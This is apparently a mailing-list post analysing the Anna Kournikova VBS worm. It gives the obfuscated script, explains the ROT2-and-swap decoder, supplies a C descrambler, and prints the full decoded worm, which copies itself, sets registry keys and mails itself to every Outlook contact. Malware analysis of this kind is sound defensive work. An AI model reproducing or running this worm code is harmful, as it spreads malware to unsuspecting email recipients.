I've taken the virus (worm really) apart a bit more: Here's the same thing, but with some comments added, and the variable names renamed for clarity: ================================================================= 'Vbs.OnTheFly Created By OnTheFly Execute HisFunction("X)udQ0VpgjnH{tEcggvf{DQVpgjnH{QptGqttgTwugoPzgvUvgGQ9v58Jr7R6?EgtvcQgldeg*vY$eUktvrU0gjnn+$9G5QJv786r0Rgtyiktgv$MJWEu^hqyvtc^gpQjVHg{n$^.jE*t9:+(jE*t33+3(Etj3*63+(jE*t23+;(Etj5*+4(Etj3*;2+(jE*t9;+(jE*t23+2(Etj3*32+(jE*t45+(jE*t33+;(Etj3*72+(jE*t33+8(Etj3*62+(jE*t45+(jE*t8:+(jE*t:;+(jE*t33+7(Etj3*;3+(jE*t23+5(Etj5*+4(Etj6*+;(Etj6*+8(Etj7*+5(Etj6*+:(Etj;*+:gUvQtcyVopldi?7Egtvcqgldeg*vu$terkkviph0nkugu{gvqoldeg$v+tyQoclVip7de0rqh{nkguyterk0veuktvrwhnncpgot.yQoclVip7dI0vgrUegckHnnqgf*t+2(^$pCcpqMtwkpqmcxl0irx0ud$kh9G5QJv786r0Rgtticgf$*MJWEu^hqyvtc^gpQjVHg{no^kcgn$f+@>$$3vgjpgp4CUJ9inEN+*pgfhkhkopqjvp*yq+3?cfpf{cp*yq+4?8jvpg9G5QJv786r0RwtpJ$vv<r11yy0y{fcp{dgvp0$n5.h.ncgupgfhkgUvMLUiJy9M59?ztyQoclVip7dq0grvpzghvnk*guyterk0veuktvrwhnncpgo.+3P\L7\Mz6wk?XLiMyUMJ99z5t0cgcfnnMLUiJy9M590znEuqgFqKhqPvt*yQoclVip7dh0nkggkzvu*uuyterk0veuktvrwhnncpgo++VgjpUvgWKg44:|6R2x?QtcyVopldi07tecggvgvvzkhgny*euktvru0terkhvnwpnoc.gVwt+ggW4K|4R:x602tyvk\g7PML6\kzXwgW4K|4R:x602nEuqgGfpKhNqqrHpwveqkp4gUp9CnJNi*E+QptGqttgTwugoPzgvUvgF54xQOzM8JT?EgtvcQgldeg*vQ$vwqnmqC0rrkncekvpq+$hKF54xQOzM8JT?Q$vwqnmqV$gjpUvgl74PvD\h;n:F?54xQOzM8JTI0vgcPgorUec*gO$RC$K+UvgUm834i35gN5?4lv7\P;D:h0nfCtfugNuukuvqHtcGjeL4TRoOuD4ToKp8U4m33gi55NKhTLo4uR4OoD0TfCtfugGuvpktugE0wqvp>[EMAIL PROTECTED];:cX|5gT?|3Vq6fFDz5yi3xLUvgk9sd4:6x5\5?F54xQOzM8JTE0gtvcKggv*o+2gUvKQ6GXDl[LQ:?TLo4uR4OoD0TfCtfugGuvpktugZ*:9X;5cT||g+k9sd4:6x5\5V0q?KQ6GXDl[LQ0:fCtfuguk9sd4:6x5\5U0dwglve?$gJgt{wqjxc.g=+q$k9sd4:6x5\5D0fq{?J$<k$(dxtehn($jEegmjVuk$#(xednth($$guvYhpu:sI[h;?3sk496d5:5x0\vCcvjegovpuhuYsp[:;I3hC0fftyQoclVip7dI0vgrUegckHnnqgf*t+2(^$pCcpqMtwkpqmcxl0irx0ud$k9sd4:6x5\5F0ngvgCgvhtgwUodvk?VwtgKhsk496d5:5x0\qV>[EMAIL PROTECTED]:6x5\5U0pgfGQ9v58Jr7R6t0igtyvkgJ$EM^WquvhcygtQ^VpgjnH^{conkfg.$$$3pGfhKgPvzpGfhKgPvzpgfhkpGfwHepkvpqX)udiy370d2")
Function HisFunction(Variable_1) 'Walk through the string, grabbing a pair of chars at a time. For I = 1 To Len(Variable_1) Step 2 Variable_2= Mid(Variable_1, I, 1) 'Get 1st char from the bg string Variable_3= Mid(Variable_1, I + 1, 1) 'get 2nd char 'Decode CR, LF, and space characters (obfuscated in the char string above... If Asc(Variable_2) = 15 Then 'If Variable_2 is ASCII 15: Variable_2= Chr(10) 'Then Make Variable_2 a LF ElseIf Asc(Variable_2) = 16 Then 'If Variable_2 is ASCII 16... Variable_2 = Chr(13) 'Then Make Variable_2 a CR ElseIf Asc(Variable_2) = 17 Then 'If Variable_2 is ASCII 17 Variable_2 = Chr(32) 'Then make Variable_2 a space Else 'If not CR, LF or space, basicly ROT2 Variable_2 = Chr(Asc(Variable_2) - 2) End If If Variable_3<> "" Then 'If we're not at the end 'Decode the second character as well, same rules as above. If Asc(Variable_3) = 15 Then Variable_3= Chr(10) ElseIf Asc(Variable_3) = 16 Then Variable_3= Chr(13) ElseIf Asc(Variable_3) = 17 Then Variable_3= Chr(32) Else 'ROT2 Variable_3= Chr(Asc(Variable_3) - 2) End If End If 'Put the decoded letters in the variable... 'TRANSPOSE THEM! HisFunction = HisFunction & Variable_3 & Variable_2 Next End Function 'Vbswg 1.50b ==================================================== The big long string at the top is scrambled (rather trivialy, but whatever) so that you can't quickly read it. Here's a .c program that will unscramble the file for you (without bothering to fix that CR/LF crap). It reads "virusstring" as its input. It currently outputs the characters and their ASCII codes to stderr, and the unscrambled output to stdout, so I'd suggest running it as: "./virusparse 1>virusout 2>outerr" to avoid messing up your terminal. ==================================================== /* Virusparse.c program by RAP. decode string in .vbs file. */ #include "stdio.h" int main(){ FILE *INFILE; int char1, char2; INFILE=fopen("virusstring","r"); while ( ( (char1=fgetc(INFILE)) != EOF ) && ( (char2=fgetc(INFILE)) != EOF) ) { fprintf(stderr,"in#1:%c(%i), in#2:%c(%i) ",char1,char1,char2,char2); /* Set new value to ROT2, make things simple */ if (char1 == 15) { char1 = 12; }; /* Change ASCII 15 to ASCII 10 (LF) */ if (char1 == 16) { char1 = 15; }; /* Change ASCII 16 to ASCII 13 (CR) */ if (char1 == 17) { char1 = 34; }; /* Change ASCII 17 to ASCII 32 (space) */ char1 = char1 - 2; if (char2 == 15) { char2 = 12; }; /* Change ASCII 15 to ASCII 10 (LF) */ if (char2 == 16) { char2 = 15; }; /* Change ASCII 16 to ASCII 13 (CR) */ if (char2 == 17) { char2 = 34; }; /* Change ASCII 17 to ASCII 32 (space) */ char2 = char2 - 2; fprintf(stderr,"out#1:%c(%i), out#2:%c(%i)\n",char1,char1,char2,char2); printf("%c%c",char2,char1); } return 0; } ================================================================ Here's the output of the program (With some retouching to take care of funky characters): ================================================================ 'Vbs.OnTheFly Created By OnTheFly On Error Resume Next Set E7O3tH65p4P = CreateObject("WScript.Shell") E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\", Chr(87) & Chr(111) & Chr(114) & Chr(109) & Chr(32) & Chr(109) & Chr(97) & Chr(100) & Chr (101) & Chr(32) & Chr(119) & Chr(105) & Chr(116) & Chr(104) & Chr(32) & Chr(86) & Chr(98) & Chr(115) & Chr(119) & Chr(103) & Chr(32) & C hr(49) & Chr(46) & Chr(53) & Chr(48) & Chr(98) Set rOwamTjngb5= Createobject("scripting.filesystemobject") rOwamTjngb5.copyfile wscript.scriptfullname,rOwamTjngb5.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs" if E7O3tH65p4P.regread ("HKCU\software\OnTheFly\mailed") <> "1" then e2nSA7HlgLC() end if if month(now) =1 and day(now) =26 then E7O3tH65p4P.run "Http://www.dynabyte.nl",3,false end if Set JKgSwHK773x= rOwamTjngb5.opentextfile(wscript.scriptfullname, 1) ZN5JKZ4xiuV= JKgSwHK773x.readall JKgSwHK773x.Close Do If Not (rOwamTjngb5.fileexists(wscript.scriptfullname)) Then Set UeI22z8P4v0= rOwamTjngb5.createtextfile(wscript.scriptfullname, True) UeI22z8P4v0.writeZN5JKZ4xiuV UeI22z8P4v0.Close End If Loop Function e2nSA7HlgLC() On Error Resume Next Set D23OvxM6KRH = CreateObject("Outlook.Application") If D23OvxM6KRH= "Outlook"Then Set j25tNZB9f8l=D23OvxM6KRH.GetNameSpace("MAPI") Set S6k211ge33L= j25tNZB9f8l.AddressLists For Each JR2mPsM2BmR In S6k211ge33L If JR2mPsM2BmR.AddressEntries.Count <> 0 Then d4BD3xgwv1J = JR2mPsM2BmR.AddressEntries.Count For X789Va3zRez= 1 To d4BD3xgwv1J Set iq72b483v3Z = D23OvxM6KRH.CreateItem(0) Set OIE4BVYjOJ8 = JR2mPsM2BmR.AddressEntries(X789Va3zRez) iq72b483v3Z.To = OIE4BVYjOJ8.Address iq72b483v3Z.Subject = "Here you have, ;o)" iq72b483v3Z.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & "" set fWsnq8YG9f1=iq72b483v3Z.Attachments fWsnq8YG9f1.Add rOwamTjngb5.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs" iq72b483v3Z.DeleteAfterSubmit = True If iq72b483v3Z.To <> "" Then iq72b483v3Z.Send E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\mailed", "1" End If Next End If Next end if End Function 'Vbswg 1.50b ================================================================ CERT has some more info out there, but that's a look at the guts of the worm anyhow... --Rich -- _________________________________________________________ Rich Puhek ETN Systems Inc. _________________________________________________________